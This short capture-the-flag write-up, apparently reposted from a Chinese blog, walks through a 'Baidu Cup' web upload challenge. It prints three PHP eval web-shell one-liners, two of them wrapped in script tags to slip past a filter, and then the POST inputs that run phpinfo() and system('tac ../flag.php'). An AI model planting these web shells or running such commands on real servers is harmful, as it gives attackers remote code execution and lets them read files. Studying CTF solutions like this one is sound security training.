当前位置:网站首页>"Baidu Cup" CTF competition in September, web:upload

"Baidu Cup" CTF competition in September, web:upload

2022-07-05 13:19:00 Part 02

Topic content :

Pass as you want , It's just that wayward .
tips:flag stay flag.php in    

<?php @eval($_POST['Pai']);?>

 <script language="pphphp">@eval($_POST['Pai']);</script>

 <script language="PHP">@eval($_POST['Pai']);</script>

At this time, the code can't be seen on the page and the source code , direct post

Pai=phpinfo();

Normal command execution acquisition flag 

system('tac ../flag.php');

原网站

版权声明
本文为[Part 02]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/186/202207051300268483.html